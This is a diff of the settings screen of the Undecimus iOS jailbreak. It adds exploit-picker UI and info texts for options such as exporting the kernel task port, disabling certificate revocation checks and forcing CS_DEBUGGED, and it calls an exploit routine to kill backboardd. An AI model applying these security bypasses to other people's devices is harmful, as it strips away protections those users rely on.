+    [self.uptimeLabel setPlaceholder:[NSString stringWithFormat:@"%d %@", (int)getUptime() / 86400, localize(@"Days")]];
+    [self.increaseMemoryLimitSwitch setOn:(BOOL)prefs->increase_memory_limit];
     [self.installSSHSwitch setOn:(BOOL)prefs->install_openssh];
     [self.installCydiaSwitch setOn:(BOOL)prefs->install_cydia];
-    [self.ECIDLabel setPlaceholder:hexFromInt([@(prefs->ecid) integerValue])];
-    [self.ReloadSystemDaemonsSwitch setOn:(BOOL)prefs->reload_system_daemons];
-    [self.HideLogWindowSwitch setOn:(BOOL)prefs->hide_log_window];
-    [self.ResetCydiaCacheSwitch setOn:(BOOL)prefs->reset_cydia_cache];
-    [self.SSHOnlySwitch setOn:(BOOL)prefs->ssh_only];
-    [self.EnableGetTaskAllowSwitch setOn:(BOOL)prefs->enable_get_task_allow];
-    [self.SetCSDebuggedSwitch setOn:(BOOL)prefs->set_cs_debugged];
-    [self.RestartSpringBoardButton setEnabled:respringSupported()];
+    if (prefs->ecid) [self.ecidLabel setPlaceholder:hexFromInt([@(prefs->ecid) integerValue])];
+    [self.reloadSystemDaemonsSwitch setOn:(BOOL)prefs->reload_system_daemons];
+    [self.hideLogWindowSwitch setOn:(BOOL)prefs->hide_log_window];
+    [self.resetCydiaCacheSwitch setOn:(BOOL)prefs->reset_cydia_cache];
+    [self.sshOnlySwitch setOn:(BOOL)prefs->ssh_only];
+    [self.enableGetTaskAllowSwitch setOn:(BOOL)prefs->enable_get_task_allow];
+    [self.setCSDebuggedSwitch setOn:(BOOL)prefs->set_cs_debugged];
+    [self.autoRespringSwitch setOn:(BOOL)prefs->auto_respring];
+    [self.restartSpringBoardButton setEnabled:respringSupported()];
     [self.restartButton setEnabled:restartSupported()];
     release_prefs(&prefs);
+    [JailbreakViewController.sharedController updateStatus];
     [self.tableView reloadData];
 }
 
-- (IBAction)TweakInjectionSwitchTriggered:(id)sender {
-    auto prefs = copy_prefs();
-    prefs->load_tweaks = (bool)self.TweakInjectionSwitch.isOn;
+- (void)tableView:(UITableView *)tableView didSelectRowAtIndexPath:(NSIndexPath *)indexPath {
+    
+    if (indexPath.row == 0) {
+        [[NSNotificationCenter defaultCenter] postNotificationName:@"showSpecialThanks" object:self];
+    }
+    
+    [tableView deselectRowAtIndexPath:indexPath animated:YES];
+}
+
+- (IBAction)selectedSpecialThanks:(id)sender {
+    
+    [[NSNotificationCenter defaultCenter] postNotificationName:@"showSpecialThanks" object:self];
+}
+
+- (IBAction)tweakInjectionSwitchValueChanged:(id)sender {
+    prefs_t *prefs = copy_prefs();
+    prefs->load_tweaks = (bool)self.tweakInjectionSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
 }
 
-- (IBAction)LoadDaemonsSwitchTriggered:(id)sender {
-    auto prefs = copy_prefs();
-    prefs->load_daemons = (bool)self.LoadDaemonsSwitch.isOn;
+- (IBAction)loadDaemonsSwitchValueChanged:(id)sender {
+    prefs_t *prefs = copy_prefs();
+    prefs->load_daemons = (bool)self.loadDaemonsSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
 }
 
-- (IBAction)DumpAPTicketSwitchTriggered:(id)sender {
-    auto prefs = copy_prefs();
-    prefs->dump_apticket = (bool)self.DumpAPTicketSwitch.isOn;
+- (IBAction)dumpAPTicketSwitchValueChanged:(id)sender {
+    prefs_t *prefs = copy_prefs();
+    prefs->dump_apticket = (bool)self.dumpAPTicketSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
 }
 
-- (IBAction)BootNonceTextFieldTriggered:(id)sender {
-    auto val = (uint64_t)0;
-    if ([[NSScanner scannerWithString:[self.BootNonceTextField text]] scanHexLongLong:&val] && val != HUGE_VAL && val != -HUGE_VAL) {
-        auto prefs = copy_prefs();
+- (IBAction)bootNonceTextFieldEditingDidEnd:(id)sender {
+    uint64_t val = 0;
+    if ([[NSScanner scannerWithString:[self.bootNonceTextField text]] scanHexLongLong:&val] && val != HUGE_VAL && val != -HUGE_VAL) {
+        prefs_t *prefs = copy_prefs();
         prefs->boot_nonce = [NSString stringWithFormat:@ADDR, val].UTF8String;
         set_prefs(prefs);
         release_prefs(&prefs);
     } else {
-        auto const alertController = [UIAlertController alertControllerWithTitle:localize(@"Invalid Entry") message:localize(@"The boot nonce entered could not be parsed") preferredStyle:UIAlertControllerStyleAlert];
-        auto const OK = [UIAlertAction actionWithTitle:localize(@"OK") style:UIAlertActionStyleDefault handler:nil];
+        UIAlertController *const alertController = [UIAlertController alertControllerWithTitle:localize(@"Invalid Entry") message:localize(@"The boot nonce entered could not be parsed") preferredStyle:UIAlertControllerStyleAlert];
+        UIAlertAction *const OK = [UIAlertAction actionWithTitle:localize(@"OK") style:UIAlertActionStyleDefault handler:nil];
         [alertController addAction:OK];
         [self presentViewController:alertController animated:YES completion:nil];
     }
     [self reloadData];
 }
 
-- (IBAction)RefreshIconCacheSwitchTriggered:(id)sender {
-    auto prefs = copy_prefs();
-    prefs->run_uicache = (bool)self.RefreshIconCacheSwitch.isOn;
+- (IBAction)refreshIconCacheSwitchValueChanged:(id)sender {
+    prefs_t *prefs = copy_prefs();
+    prefs->run_uicache = (bool)self.refreshIconCacheSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
 }
 
-- (IBAction)KernelExploitSegmentedControl:(id)sender {
-    auto prefs = copy_prefs();
-    prefs->exploit = (int)self.KernelExploitSegmentedControl.selectedSegmentIndex;
+- (NSInteger)numberOfComponentsInPickerView:(UIPickerView *)pickerView {
+    return 1;
+}
+
+- (NSInteger)pickerView:(UIPickerView *)pickerView numberOfRowsInComponent:(NSInteger)component {
+    NSInteger count = 0;
+    if (pickerView == _kernelExploitPickerView) {
+        count = [self.availableExploits count];
+    } else if (pickerView == _codeSubstitutorPickerView) {
+        count = [self.availableSubstitutors count];
+    }
+    return count;
+}
+
+- (NSString *)pickerView:(UIPickerView *)pickerView titleForRow:(NSInteger)row forComponent:(NSInteger)component {
+    NSString *title = nil;
+    if (pickerView == _kernelExploitPickerView) {
+        title = [[self.availableExploits allKeys] objectAtIndex:row];
+    } else if (pickerView == _codeSubstitutorPickerView) {
+        title = [[self.availableSubstitutors allKeys] objectAtIndex:row];
+    }
+    return title;
+}
+
+- (NSAttributedString *)pickerView:(UIPickerView *)pickerView attributedTitleForRow:(NSInteger)row forComponent:(NSInteger)component {
+    NSString *title = nil;
+    if (pickerView == _kernelExploitPickerView) {
+        title = [self.availableExploits.allKeys objectAtIndex:row];
+    } else if (pickerView == _codeSubstitutorPickerView) {
+        title = [self.availableSubstitutors.allKeys objectAtIndex:row];
+    }
+    if (title == nil) {
+        return nil;
+    }
+    prefs_t *prefs = copy_prefs();
+    NSDictionary *attributes = @{NSForegroundColorAttributeName : prefs->dark_mode ? [UIColor whiteColor] : [UIColor blackColor] };
+    release_prefs(&prefs);
+    NSAttributedString *attributedString = [[NSAttributedString alloc] initWithString:title attributes:attributes];
+    return attributedString;
+}
+
+- (void)pickerView:(UIPickerView *)pickerView didSelectRow:(NSInteger)row inComponent:(NSInteger)component {
+    self.isPicking = YES;
+}
+
+- (void)exploitPickerDoneAction {
+    self.isPicking = NO;
+    prefs_t *prefs = copy_prefs();
+    prefs->exploit = [[_availableExploits objectForKey:[[_availableExploits allKeys] objectAtIndex:[[self kernelExploitPickerView] selectedRowInComponent:0]]] intValue];
     set_prefs(prefs);
     release_prefs(&prefs);
+    [[self kernelExploitTextField] resignFirstResponder];
     [self reloadData];
 }
 
-- (IBAction)DisableAppRevokesSwitchTriggered:(id)sender {
-    auto prefs = copy_prefs();
-    prefs->disable_app_revokes = (bool)self.DisableAppRevokesSwitch.isOn;
+- (void)substitutorPickerDoneAction {
+    self.isPicking = NO;
+    prefs_t *prefs = copy_prefs();
+    prefs->code_substitutor = [[_availableSubstitutors objectForKey:[[_availableSubstitutors allKeys] objectAtIndex:[[self codeSubstitutorPickerView] selectedRowInComponent:0]]] intValue];
+    set_prefs(prefs);
+    release_prefs(&prefs);
+    [[self codeSubstitutorTextField] resignFirstResponder];
+    [self reloadData];
+}
+
+- (IBAction)disableAppRevokesSwitchValueChanged:(id)sender {
+    prefs_t *prefs = copy_prefs();
+    prefs->disable_app_revokes = (bool)self.disableAppRevokesSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
 }
 
 - (IBAction)tappedOnRestart:(id)sender {
-    auto const block = ^(void) {
+    void (^const block)(void) = ^(void) {
         notice(localize(@"The device will be restarted."), true, false);
-        auto const support = recommendedRestartSupport();
+        NSInteger const support = recommendedRestartSupport();
         switch (support) {
             case necp_exploit: {
                 necp_die();
@@ -199,20 +413,20 @@
     dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0ul), block);
 }
 
-- (IBAction)DisableAutoUpdatesSwitchTriggered:(id)sender {
-    auto prefs = copy_prefs();
-    prefs->disable_auto_updates = (bool)self.DisableAutoUpdatesSwitch.isOn;
+- (IBAction)disableAutoUpdatesSwitchValueChanged:(id)sender {
+    prefs_t *prefs = copy_prefs();
+    prefs->disable_auto_updates = (bool)self.disableAutoUpdatesSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
 }
 
 - (IBAction)tappedOnShareDiagnosticsData:(id)sender {
-    auto const URL = [NSURL fileURLWithPath:[NSString stringWithFormat:@"%@/Documents/diagnostics.plist", NSHomeDirectory()]];
+    NSURL *const URL = [NSURL fileURLWithPath:[NSString stringWithFormat:@"%@/Documents/diagnostics.plist", NSHomeDirectory()]];
     [getDiagnostics() writeToURL:URL error:nil];
-    auto const activityViewController = [[UIActivityViewController alloc] initWithActivityItems:@[URL] applicationActivities:nil];
+    UIActivityViewController *const activityViewController = [[UIActivityViewController alloc] initWithActivityItems:@[URL] applicationActivities:nil];
     if ([activityViewController respondsToSelector:@selector(popoverPresentationController)]) {
-        [[activityViewController popoverPresentationController] setSourceView:self.ShareDiagnosticsDataButton];
+        [[activityViewController popoverPresentationController] setSourceView:self.shareDiagnosticsDataButton];
     }
     [self presentViewController:activityViewController animated:YES completion:nil];
 }
@@ -225,43 +439,43 @@
     [[UIApplication sharedApplication] openURL:[NSURL URLWithString:@"https://github.com/pwn20wndstuff/Undecimus"] options:@{} completionHandler:nil];
 }
 
-- (IBAction)OverwriteBootNonceSwitchTriggered:(id)sender {
-    auto prefs = copy_prefs();
-    prefs->overwrite_boot_nonce = (bool)self.OverwriteBootNonceSwitch.isOn;
+- (IBAction)overwriteBootNonceSwitchValueChanged:(id)sender {
+    prefs_t *prefs = copy_prefs();
+    prefs->overwrite_boot_nonce = (bool)self.overwriteBootNonceSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
 }
 
 - (IBAction)tappedOnCopyNonce:(id)sender{
-    auto const copyBootNonceAlert = [UIAlertController alertControllerWithTitle:localize(@"Copy boot nonce?") message:localize(@"Would you like to copy nonce generator to clipboard?") preferredStyle:UIAlertControllerStyleAlert];
-    auto const copyAction = [UIAlertAction actionWithTitle:localize(@"Yes") style:UIAlertActionStyleDefault handler:^(UIAlertAction * _Nonnull action) {
-        auto prefs = copy_prefs();
+    UIAlertController *const copyBootNonceAlert = [UIAlertController alertControllerWithTitle:localize(@"Copy boot nonce?") message:localize(@"Would you like to copy nonce generator to clipboard?") preferredStyle:UIAlertControllerStyleAlert];
+    UIAlertAction *const copyAction = [UIAlertAction actionWithTitle:localize(@"Yes") style:UIAlertActionStyleDefault handler:^(UIAlertAction * _Nonnull action) {
+        prefs_t *prefs = copy_prefs();
         [[UIPasteboard generalPasteboard] setString:@(prefs->boot_nonce)];
         release_prefs(&prefs);
     }];
-    auto const noAction = [UIAlertAction actionWithTitle:localize(@"No") style:UIAlertActionStyleCancel handler:nil];
+    UIAlertAction *const noAction = [UIAlertAction actionWithTitle:localize(@"No") style:UIAlertActionStyleCancel handler:nil];
     [copyBootNonceAlert addAction:copyAction];
     [copyBootNonceAlert addAction:noAction];
     [self presentViewController:copyBootNonceAlert animated:TRUE completion:nil];
 }
 
 - (IBAction)tappedOnCopyECID:(id)sender {
-    auto const copyBootNonceAlert = [UIAlertController alertControllerWithTitle:localize(@"Copy ECID?") message:localize(@"Would you like to ECID to clipboard?") preferredStyle:UIAlertControllerStyleAlert];
-    auto const copyAction = [UIAlertAction actionWithTitle:localize(@"Yes") style:UIAlertActionStyleDefault handler:^(UIAlertAction * _Nonnull action) {
-        auto prefs = copy_prefs();
+    UIAlertController *const copyBootNonceAlert = [UIAlertController alertControllerWithTitle:localize(@"Copy ECID?") message:localize(@"Would you like to copy ECID to clipboard?") preferredStyle:UIAlertControllerStyleAlert];
+    UIAlertAction *const copyAction = [UIAlertAction actionWithTitle:localize(@"Yes") style:UIAlertActionStyleDefault handler:^(UIAlertAction * _Nonnull action) {
+        prefs_t *prefs = copy_prefs();
         [[UIPasteboard generalPasteboard] setString:hexFromInt(@(prefs->ecid).integerValue)];
         release_prefs(&prefs);
     }];
-    auto const noAction = [UIAlertAction actionWithTitle:localize(@"No") style:UIAlertActionStyleCancel handler:nil];
+    UIAlertAction *const noAction = [UIAlertAction actionWithTitle:localize(@"No") style:UIAlertActionStyleCancel handler:nil];
     [copyBootNonceAlert addAction:copyAction];
     [copyBootNonceAlert addAction:noAction];
     [self presentViewController:copyBootNonceAlert animated:TRUE completion:nil];
 }
 
 - (IBAction)tappedOnCheckForUpdate:(id)sender {
-    auto const block = ^(void) {
-        auto const update = [NSString stringWithContentsOfURL:[NSURL URLWithString:@"https://github.com/pwn20wndstuff/Undecimus/raw/master/Update.txt"] encoding:NSUTF8StringEncoding error:nil];
+    void (^const block)(void) = ^(void) {
+        NSString *const update = [NSString stringWithContentsOfURL:[NSURL URLWithString:@"https://github.com/pwn20wndstuff/Undecimus/raw/master/Update.txt"] encoding:NSUTF8StringEncoding error:nil];
         if (update == nil) {
             notice(localize(@"Failed to check for update."), true, false);
         } else if ([update compare:appVersion() options:NSNumericSearch] == NSOrderedDescending) {
@@ -273,32 +487,32 @@
     dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0ul), block);
 }
 
-- (IBAction)exportKernelTaskPortSwitchTriggered:(id)sender {
-    auto prefs = copy_prefs();
-    prefs->export_kernel_task_port = (bool)self.ExportKernelTaskPortSwitch.isOn;
+- (IBAction)exportKernelTaskPortSwitchValueChanged:(id)sender {
+    prefs_t *prefs = copy_prefs();
+    prefs->export_kernel_task_port = (bool)self.exportKernelTaskPortSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
 }
 
-- (IBAction)RestoreRootFSSwitchTriggered:(id)sender {
-    auto prefs = copy_prefs();
-    prefs->restore_rootfs = (bool)self.RestoreRootFSSwitch.isOn;
+- (IBAction)restoreRootFSSwitchValueChanged:(id)sender {
+    prefs_t *prefs = copy_prefs();
+    prefs->restore_rootfs = (bool)self.restoreRootFSSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
 }
 
-- (IBAction)installCydiaSwitchTriggered:(id)sender {
-    auto prefs = copy_prefs();
+- (IBAction)installCydiaSwitchValueChanged:(id)sender {
+    prefs_t *prefs = copy_prefs();
     prefs->install_cydia = (bool)self.installCydiaSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
 }
 
-- (IBAction)installSSHSwitchTriggered:(id)sender {
-    auto prefs = copy_prefs();
+- (IBAction)installSSHSwitchValueChanged:(id)sender {
+    prefs_t *prefs = copy_prefs();
     prefs->install_openssh = (bool)self.installSSHSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
@@ -310,37 +524,37 @@
     footerView.textLabel.textAlignment = NSTextAlignmentCenter;
 }
 
-- (IBAction)IncreaseMemoryLimitSwitch:(id)sender {
-    auto prefs = copy_prefs();
-    prefs->increase_memory_limit = (bool)self.IncreaseMemoryLimitSwitch.isOn;
+- (IBAction)increaseMemoryLimitSwitch:(id)sender {
+    prefs_t *prefs = copy_prefs();
+    prefs->increase_memory_limit = (bool)self.increaseMemoryLimitSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
 }
 
 - (IBAction)tappedOnAutomaticallySelectExploit:(id)sender {
-    auto prefs = copy_prefs();
+    prefs_t *prefs = copy_prefs();
     prefs->exploit = (int)recommendedJailbreakSupport();
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
 }
 
-- (IBAction)reloadSystemDaemonsSwitchTriggered:(id)sender {
-    auto prefs = copy_prefs();
-    prefs->reload_system_daemons = (bool)self.ReloadSystemDaemonsSwitch.isOn;
+- (IBAction)reloadSystemDaemonsSwitchValueChanged:(id)sender {
+    prefs_t *prefs = copy_prefs();
+    prefs->reload_system_daemons = (bool)self.reloadSystemDaemonsSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
 }
 
 - (IBAction)tappedRestartSpringBoard:(id)sender {
-    auto const block = ^(void) {
+    void (^const block)(void) = ^(void) {
         notice(localize(@"SpringBoard will be restarted."), true, false);
-        auto const support = recommendedRespringSupport();
+        NSInteger const support = recommendedRespringSupport();
         switch (support) {
             case deja_xnu_exploit: {
-                auto const bb_tp = hid_event_queue_exploit();
+                mach_port_t const bb_tp = hid_event_queue_exploit();
                 _assert(MACH_PORT_VALID(bb_tp), localize(@"Unable to get task port for backboardd."), true);
                 _assert(thread_call_remote(bb_tp, exit, 1, REMOTE_LITERAL(EXIT_SUCCESS)) == ERR_SUCCESS, localize(@"Unable to make backboardd exit."), true);
                 break;
@@ -358,53 +572,61 @@
     notice(localize(@"Cleaned diagnostics data."), false, false);
 }
 
-- (IBAction)hideLogWindowSwitchTriggered:(id)sender {
-    auto prefs = copy_prefs();
-    prefs->hide_log_window = (bool)self.HideLogWindowSwitch.isOn;
+- (IBAction)hideLogWindowSwitchValueChanged:(id)sender {
+    prefs_t *prefs = copy_prefs();
+    prefs->hide_log_window = (bool)self.hideLogWindowSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
-    auto const block = ^(void) {
+    void (^const block)(void) = ^(void) {
         notice(localize(@"Preference was changed. The app will now exit."), true, false);
         exit(EXIT_SUCCESS);
     };
     dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0ul), block);
 }
 
-- (IBAction)resetCydiaCacheSwitchTriggered:(id)sender {
-    auto prefs = copy_prefs();
-    prefs->reset_cydia_cache = (bool)self.ResetCydiaCacheSwitch.isOn;
+- (IBAction)resetCydiaCacheSwitchValueChanged:(id)sender {
+    prefs_t *prefs = copy_prefs();
+    prefs->reset_cydia_cache = (bool)self.resetCydiaCacheSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
 }
 
-- (IBAction)sshOnlySwitchTriggered:(id)sender {
-    auto prefs = copy_prefs();
-    prefs->ssh_only = (bool)self.SSHOnlySwitch.isOn;
+- (IBAction)sshOnlySwitchValueChanged:(id)sender {
+    prefs_t *prefs = copy_prefs();
+    prefs->ssh_only = (bool)self.sshOnlySwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
 }
 
-- (IBAction)enableGetTaskAllowSwitchTriggered:(id)sender {
-    auto prefs = copy_prefs();
-    prefs->enable_get_task_allow = (bool)self.EnableGetTaskAllowSwitch.isOn;
+- (IBAction)enableGetTaskAllowSwitchValueChanged:(id)sender {
+    prefs_t *prefs = copy_prefs();
+    prefs->enable_get_task_allow = (bool)self.enableGetTaskAllowSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
 }
 
 - (IBAction)setCSDebugged:(id)sender {
-    auto prefs = copy_prefs();
-    prefs->set_cs_debugged = (bool)self.SetCSDebuggedSwitch.isOn;
+    prefs_t *prefs = copy_prefs();
+    prefs->set_cs_debugged = (bool)self.setCSDebuggedSwitch.isOn;
+    set_prefs(prefs);
+    release_prefs(&prefs);
+    [self reloadData];
+}
+
+- (IBAction)setAutoRespring:(id)sender {
+    prefs_t *prefs = copy_prefs();
+    prefs->auto_respring = (bool)self.autoRespringSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
 }
 
 - (IBAction)tappedOnResetAppPreferences:(id)sender {
-    auto const block = ^(void) {
+    void (^const block)(void) = ^(void) {
         reset_prefs();
         notice(localize(@"Preferences were reset. The app will now exit."), true, false);
         exit(EXIT_SUCCESS);
@@ -412,6 +634,268 @@
     dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0ul), block);
 }
 
+- (IBAction)tappedOnLoadTweaksInfoButton:(id)sender {
+    showAlert(localize(@"Load Tweaks"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes Substrate load extensions that are commonly referred to as tweaks in newly started processes."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64 SoCs (A7-A11)."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnLoadDaemonsInfoButton:(id)sender {
+    showAlert(localize(@"Load Daemons"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak load the launch daemons located at /Library/LaunchDaemons and execute files located at /etc/rc.d."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64/arm64e SoCs (A7-A12X)."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnDumpAPTicketInfoButton:(id)sender {
+    showAlert(localize(@"Dump APTicket"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak create a copy of the system APTicket located at /System/Library/Caches/apticket.der at its Documents directory which is accessible via iTunes File Sharing."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64/arm64e SoCs (A7-A12X)."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnRefreshIconCacheInfoButton:(id)sender {
+    showAlert(localize(@"Refresh Icon Cache"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak regenerate SpringBoard's system application installation cache to cause newly installed .app bundles to appear on the icon list."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64/arm64e SoCs (A7-A12X)."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnDisableAutoUpdatesInfoButton:(id)sender {
+    showAlert(localize(@"Disable Updates"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak effectively disable the system's software update mechanism to prevent the system from automatically upgrading to the latest available firmware which may not be supported by the jailbreak at that time."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64/arm64e SoCs (A7-A12X)."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnDisableAppRevokesInfoButton:(id)sender {
+    showAlert(localize(@"Disable Revokes"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak effectively disable the system's online certificate status protocol system to prevent enterprise certificates which the jailbreak may be signed with from getting revoked."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-11.4.1 on arm64 SoCs (A7-A11)."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnOverwriteBootNonceInfoButton:(id)sender {
+    showAlert(localize(@"Set Boot Nonce"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak set the persistent com.apple.System.boot-nonce variable in non-volatile random-access memory (NVRAM) which may be required to downgrade to an unsigned iOS firmware by using SHSH files."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64/arm64e SoCs (A7-A12X)."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnExportKernelTaskPortInfoButton:(id)sender {
+    showAlert(localize(@"Export TFP0"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak modify the host-port to grant any process access to the host-priv-port."
+                       "\n"
+                       "This option effectively grants any process access to the kernel task port (TFP0) and allows re-jailbreaking without exploiting again."
+                       "\n"
+                       "This option is considered unsafe as the privilege this option effectively grants to processes can be used for bad purposes by malicous apps."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64/arm64e SoCs (A7-A12X)."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnRestoreRootFSInfoButton:(id)sender {
+    showAlert(localize(@"Restore RootFS"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak restore the root filesystem (RootFS) to the snapshot which is created by the system when the device is restored."
+                       "\n"
+                       "This option effectively allows uninstalling the jailbreak without losing any user data."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64/arm64e SoCs (A7-A12X)."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnIncreaseMemoryLimitInfoButton:(id)sender {
+    showAlert(localize(@"Max Memory Limit"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak modify the Jetsam configuration file to increase the memory limit that is enforced upon processes by Jetsam to the maximum value to effectively bypass that mechanism."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64 SoCs (A7-A11)."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnInstallSSHInfoButton:(id)sender {
+    showAlert(localize(@"(Re)Install OpenSSH"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak (re)install the openssh package."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64 SoCs (A7-A11)."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnInstallCydiaInfoButton:(id)sender {
+    showAlert(localize(@"Reinstall Cydia"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes jailbreak reinstall the cydiainstaller package."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64 SoCs (A7-A11)."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnReloadSystemDaemonsInfoButton:(id)sender {
+    showAlert(localize(@"Reload Daemons"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak reload all of the running system daemons to make the Substrate extensions (tweaks) load in them."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64 SoCs (A7-A11)."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnHideLogWindowInfoButton:(id)sender {
+    showAlert(localize(@"Hide Log Window"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option hides the log window or console in the jailbreak app for a more clean look."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnResetCydiaCacheInfoButton:(id)sender {
+    showAlert(localize(@"Reset Cydia Cache"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak reset Cydia's cache."
+                       "\n"
+                       "This option will cause Cydia to regenerate the repo lists and its cache."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64 SoCs (A7-A11)."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnSSHOnlyInfoButton:(id)sender {
+    showAlert(localize(@"SSH Only"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak skip installing Cydia and Substrate."
+                       "\n"
+                       "This option starts SSH on 127.0.0.1 (localhost) on port 22 via dropbear."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64/arm64e SoCs (A7-A12X)."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnEnableGetTaskAllowInfoButton:(id)sender {
+    showAlert(localize(@"Set get-task-allow"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak dynamically enable the get-task-allow entitlement for every new process."
+                       "\n"
+                       "This option makes dyld treat the processes unrestricted."
+                       "\n"
+                       "This option enables dyld environment variables such as DYLD_INSERT_LIBRARIES."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64 SoCs (A7-A11)."),
+              false,
+              false);
+}
+- (IBAction)tappedOnCSDebuggedInfoButton:(id)sender {
+    showAlert(localize(@"Set CS_DEBUGGED"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak dynamically set the CS_DEBUGGED codesign flag for every new process."
+                       "\n"
+                       "This option makes the kernel allow processes to run with invalid executable pages."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64 SoCs (A7-A11)."),
+              false,
+              false);
+}
+- (IBAction)tappedOnAutoRespringInfoButton:(id)sender {
+    showAlert(localize(@"Auto Respring"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak automatically restart the SpringBoard as soon as the jailbreak process is completed without the confirmation."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64 SoCs (A7-A11)."),
+              false,
+              false);
+}
+
+
+- (CGFloat)tableView:(UITableView *)tableView heightForRowAtIndexPath:(NSIndexPath *)indexPath {
+    return 44;
+}
+
 - (void)didReceiveMemoryWarning {
     [super didReceiveMemoryWarning];
     // Dispose of any resources that can be recreated.

Undecimus/source/machswap2_pwn.m

@@ -625,6 +625,9 @@ extern uint64_t kernel_base;
 extern uint64_t kernel_slide;
 extern uint64_t ReadKernel64(uint64_t kaddr);
 extern void WriteKernel64(uint64_t kaddr, uint64_t val);
